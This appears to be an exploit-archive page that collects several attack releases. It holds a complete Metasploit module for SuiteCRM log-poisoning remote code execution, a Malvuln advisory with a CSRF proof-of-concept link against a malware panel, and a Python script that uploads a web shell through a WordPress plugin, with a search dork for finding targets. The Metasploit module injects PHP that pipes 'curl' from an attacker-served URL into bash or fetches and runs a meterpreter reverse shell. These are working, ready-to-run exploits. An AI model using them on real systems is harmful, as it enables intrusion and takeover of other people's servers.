/>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Steffen Rogge / @2022<br /><br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = GoodRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::CmdStager<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'SuiteCRM Log File Remote Code Execution',<br /> 'Description' => %q{<br /> This module exploits an input validation error on the log file extension parameter. It does<br /> not properly validate upper/lower case characters. Once this occurs, the application log file<br /> will be treated as a php file. The log file can then be populated with php code by changing the<br /> username of a valid user, as this info is logged. The php code in the file can then be executed<br /> by sending an HTTP request to the log file. A similar issue was reported by the same researcher<br /> where a blank file extension could be supplied and the extension could be provided in the file<br /> name. This exploit will work on those versions as well, and those references are included.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'M. Cory Billington' # @_th3y<br /> ],<br /> 'References' => [<br /> ['CVE', '2021-42840'],<br /> ['CVE', '2020-28328'], # First CVE<br /> ['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue.<br /> ['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit<br /> ['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit<br /> ],<br /> 'Platform' => %w[linux unix],<br /> 'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86],<br /> 'Targets' => [<br /> [<br /> 'Linux (x64)', {<br /> 'Arch' => ARCH_X64,<br /> 'Platform' => 'linux',<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux (cmd)', {<br /> 'Arch' => ARCH_CMD,<br /> 'Platform' => 'unix',<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ]<br /> ],<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],<br /> 'Reliability' => [REPEATABLE_SESSION]<br /> },<br /> 'Privileged' => true,<br /> 'DisclosureDate' => '2021-04-28',<br /> 'DefaultTarget' => 0<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']),<br /> OptString.new('USER', [true, 'Username of user with administrative rights', 'admin']),<br /> OptString.new('PASS', [true, 'Password for administrator', 'admin']),<br /> OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', true]),<br /> OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']),<br /> OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> authenticate unless @authenticated<br /> return Exploit::CheckCode::Unknown unless @authenticated<br /><br /> version_check_request = send_request_cgi(<br /> {<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'index.php'),<br /> 'keep_cookies' => true,<br /> 'vars_get' => {<br /> 'module' => 'Home',<br /> 'action' => 'About'<br /> }<br /> }<br /> )<br /><br /> return Exploit::CheckCode::Unknown("#{peer} - Connection timed out") unless version_check_request<br /><br /> version_match = version_check_request.body[/<br /> Version<br /> \s<br /> \d{1} # Major revision<br /> \.<br /> \d{1,2} # Minor revision<br /> \.<br /> \d{1,2} # Bug fix release<br /> /x]<br /><br /> version = version_match.partition(' ').last<br /><br /> if version.nil? || version.empty?<br /> about_url = "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About"<br /> return Exploit::CheckCode::Unknown("Check #{about_url} to confirm version.")<br /> end<br /><br /> patched_version = Rex::Version.new('7.11.18')<br /> current_version = Rex::Version.new(version)<br /><br /> return Exploit::CheckCode::Appears("SuiteCRM #{version}") if current_version <= patched_version<br /><br /> Exploit::CheckCode::Safe("SuiteCRM #{version}")<br /> end<br /><br /> def authenticate<br /> print_status("Authenticating as #{datastore['USER']}")<br /> initial_req = send_request_cgi(<br /> {<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri, 'index.php'),<br /> 'keep_cookies' => true,<br /> 'vars_get' => {<br /> 'module' => 'Users',<br /> 'action' => 'Login'<br /> }<br /> }<br /> )<br /><br /> return false unless initial_req && initial_req.code == 200<br /><br /> login = send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri, 'index.php'),<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'module' => 'Users',<br /> 'action' => 'Authenticate',<br /> 'return_module' => 'Users',<br /> 'return_action' => 'Login',<br /> 'user_name' => datastore['USER'],<br /> 'username_password' => datastore['PASS'],<br /> 'Login' => 'Log In'<br /> }<br /> }<br /> )<br /><br /> return false unless login && login.code == 302<br /><br /> res = send_request_cgi(<br /> {<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri, 'index.php'),<br /> 'keep_cookies' => true,<br /> 'vars_get' => {<br /> 'module' => 'Administration',<br /> 'action' => 'index'<br /> }<br /> }<br /> )<br /><br /> auth_succeeded?(res)<br /> end<br /><br /> def auth_succeeded?(res)<br /> return false unless res<br /><br /> if res.code == 200<br /> print_good("Authenticated as: #{datastore['USER']}")<br /> if res.body.include?('Unauthorized access to administration.')<br /> print_warning("#{datastore['USER']} does not have administrative rights! Exploit will fail.")<br /> @is_admin = false<br /> else<br /> print_good("#{datastore['USER']} has administrative rights.")<br /> @is_admin = true<br /> end<br /> @authenticated = true<br /> return true<br /> else<br /> print_error("Failed to authenticate as: #{datastore['USER']}")<br /> return false<br /> end<br /> end<br /><br /> def post_log_file(data)<br /> send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri, 'index.php'),<br /> 'ctype' => "multipart/form-data; boundary=#{data.bound}",<br /> 'keep_cookies' => true,<br /> 'headers' => {<br /> 'Referer' => "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView"<br /> },<br /> 'data' => data.to_s<br /> }<br /> )<br /> end<br /><br /> def modify_system_settings_file<br /> filename = rand_text_alphanumeric(8).to_s<br /> extension = '.pHp'<br /> @php_fname = filename + extension<br /> action = 'Modify system settings file'<br /> print_status("Trying - #{action}")<br /><br /> data = Rex::MIME::Message.new<br /> data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')<br /> data.add_part('Configurator', nil, nil, 'form-data; name="module"')<br /> data.add_part(filename.to_s, nil, nil, 'form-data; name="logger_file_name"')<br /> data.add_part(extension.to_s, nil, nil, 'form-data; name="logger_file_ext"')<br /> data.add_part('info', nil, nil, 'form-data; name="logger_level"')<br /> data.add_part('Save', nil, nil, 'form-data; name="save"')<br /><br /> res = post_log_file(data)<br /> check_logfile_request(res, action)<br /> end<br /><br /> def poison_log_file<br /> action = 'Poison log file'<br /> if target.arch.first == 'cmd'<br /> command_injection = "<?php `curl #{@download_url} | bash`; ?>"<br /> else<br /> @meterpreter_fname = "#{datastore['WRITABLEDIR']}/#{rand_text_alphanumeric(8)}"<br /> command_injection = %(<br /> <?php `curl #{@download_url} -o #{@meterpreter_fname};<br /> /bin/chmod 700 #{@meterpreter_fname};<br /> /bin/sh -c #{@meterpreter_fname};`; ?><br /> )<br /> end<br /><br /> print_status("Trying - #{action}")<br /><br /> data = Rex::MIME::Message.new<br /> data.add_part('Users', nil, nil, 'form-data; name="module"')<br /> data.add_part('1', nil, nil, 'form-data; name="record"')<br /> data.add_part('Save', nil, nil, 'form-data; name="action"')<br /> data.add_part('EditView', nil, nil, 'form-data; name="page"')<br /> data.add_part('DetailView', nil, nil, 'form-data; name="return_action"')<br /> data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')<br /> data.add_part(command_injection, nil, nil, 'form-data; name="last_name"')<br /><br /> res = post_log_file(data)<br /> check_logfile_request(res, action)<br /> end<br /><br /> def restore<br /> action = 'Restore logging to default configuration'<br /> print_status("Trying - #{action}")<br /><br /> data = Rex::MIME::Message.new<br /> data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')<br /> data.add_part('Configurator', nil, nil, 'form-data; name="module"')<br /> data.add_part('suitecrm', nil, nil, 'form-data; name="logger_file_name"')<br /> data.add_part('.log', nil, nil, 'form-data; name="logger_file_ext"')<br /> data.add_part('fatal', nil, nil, 'form-data; name="logger_level"')<br /> data.add_part('Save', nil, nil, 'form-data; name="save"')<br /><br /> post_log_file(data)<br /><br /> data = Rex::MIME::Message.new<br /> data.add_part('Users', nil, nil, 'form-data; name="module"')<br /> data.add_part('1', nil, nil, 'form-data; name="record"')<br /> data.add_part('Save', nil, nil, 'form-data; name="action"')<br /> data.add_part('EditView', nil, nil, 'form-data; name="page"')<br /> data.add_part('DetailView', nil, nil, 'form-data; name="return_action"')<br /> data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')<br /> data.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name="last_name"')<br /><br /> res = post_log_file(data)<br /><br /> print_error("Failed - #{action}") unless res && res.code == 301<br /><br /> print_good("Succeeded - #{action}")<br /> end<br /><br /> def check_logfile_request(res, action)<br /> fail_with(Failure::Unknown, "#{action} - no reply") unless res<br /><br /> unless res.code == 301<br /> print_error("Failed - #{action}")<br /> fail_with(Failure::UnexpectedReply, "Failed - #{action}")<br /> end<br /><br /> print_good("Succeeded - #{action}")<br /> end<br /><br /> def execute_php<br /> print_status("Executing php code in log file: #{@php_fname}")<br /> res = send_request_cgi(<br /> {<br /> 'uri' => normalize_uri(target_uri, @php_fname),<br /> 'keep_cookies' => true<br /> }<br /> )<br /> fail_with(Failure::NotFound, "#{peer} - Not found: #{@php_fname}") if res && res.code == 404<br /> register_files_for_cleanup(@php_fname)<br /> register_files_for_cleanup(@meterpreter_fname) unless @meterpreter_fname.nil? || @meterpreter_fname.empty?<br /> end<br /><br /> def on_request_uri(cli, _request)<br /> send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })<br /> print_good("#{peer} - Payload sent!")<br /> end<br /><br /> def start_http_server<br /> start_service(<br /> {<br /> 'Uri' => {<br /> 'Proc' => proc do |cli, req|<br /> on_request_uri(cli, req)<br /> end,<br /> 'Path' => resource_uri<br /> }<br /> }<br /> )<br /> @download_url = get_uri<br /> end<br /><br /> def exploit<br /> start_http_server<br /> authenticate unless @authenticated<br /> fail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated<br /> fail_with(Failure::NoAccess, "#{datastore['USER']} does not have administrative rights!") unless @is_admin<br /> modify_system_settings_file<br /> poison_log_file<br /> execute_php<br /> ensure<br /> restore if datastore['RESTORECONF']<br /> end<br />end<br /> <br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/61285c988de52b7c067fb2e703f2ab83_C.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: CosaNostra Builder WebPanel <br />Vulnerability: Cross Site Request Forgery (CSRF)<br />Description: The Panel does not provide a CSRF security token to verify and process only authorized HTTP POST requests for "tasks.php". This can allow unauthorized deletion of tasks from the MySQL database if a panel user clicks an infected link or visits a malicious webpage, the bot HWID however would need to be known up front or guessed.<br /><br />$id = @$_GET['id'];<br /> if(isset($id)){<br /> mysqli_query($condb,"DELETE FROM `tasks` WHERE `HWID`='$id'");<br /><br /><br />Type: WebUI<br />MD5: 61285c988de52b7c067fb2e703f2ab83<br />MD5: de5d209faa9dfbcd1d5e551273ae9c06 (tasks.php)<br />Vuln ID: MVID-2022-0473<br />Disclosure: 01/24/2022<br /><br />Exploit/PoC:<br />HREF="http://MALWARE_C2_IP/WebPanel/Panel/tasks.php?id=3"<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload<br /># Google Dork: inurl: /wp-content/plugins/smart-product-review/<br /># Date: 16/11/2021<br /># Exploit Author: Keyvan Hardani<br /># Vendor Homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/<br /># Version: <= 1.0.4<br /># Tested on: Kali Linux<br /><br />import os.path<br />from os import path<br />import json<br />import requests;<br />import time<br />import sys<br /><br />def banner():<br /> animation = "|/-\\"<br /> for i in range(20):<br /> time.sleep(0.1)<br /> sys.stdout.write("\r" + animation[i % len(animation)])<br /> sys.stdout.flush()<br /> #do something<br /> print("Smart Product Review 1.0.4 - Arbitrary File Upload")<br /> print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)")<br /><br />def usage():<br /> print("Usage: python3 exploit.py [target url] [your shell]")<br /> print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")<br /><br />def vuln_check(uri):<br /> response = requests.get(uri)<br /> raw = response.text<br /><br /> if ("No script kiddies please!!" in raw):<br /> return False;<br /> else:<br /> return True;<br /><br />def main():<br /><br /> banner()<br /> if(len(sys.argv) != 3):<br /> usage();<br /> sys.exit(1);<br /><br /> base = sys.argv[1]<br /> file_path = sys.argv[2]<br /><br /> ajax_action = 'sprw_file_upload_action'<br /> admin = '/wp-admin/admin-ajax.php';<br /><br /> uri = base + admin + '?action=' + ajax_action ;<br /> check = vuln_check(uri);<br /><br /> if(check == False):<br /> print("(*) Target not vulnerable!");<br /> sys.exit(1)<br /><br /> if( path.isfile(file_path) == False):<br /> print("(*) Invalid file!")<br /> sys.exit(1)<br /><br /> files = {'files[]' : open(file_path)}<br /> data = {<br /> "allowedExtensions[0]" : "jpg",<br /> "allowedExtensions[1]" : "php4",<br /> "allowedExtensions[2]" : "phtml",<br /> "allowedExtensions[3]" : "png",<br /> "qqfile" : "files",<br /> "element_id" : "6837",<br /> "sizeLimit" : "12000000",<br /> "file_uploader_nonce" : "2b102311b7"<br /> }<br /> print("Uploading Shell...");<br /> response = requests.post(uri, files=files, data=data )<br /> file_name = path.basename(file_path)<br /> if("ok" in response.text):<br /> print("Shell Uploaded!")<br /> print("Shell URL on your Review/Comment");<br /> else:<br /> print("Shell Upload Failed")<br /> sys.exit(1)<br /><br />main();<br /> <br /></code></pre>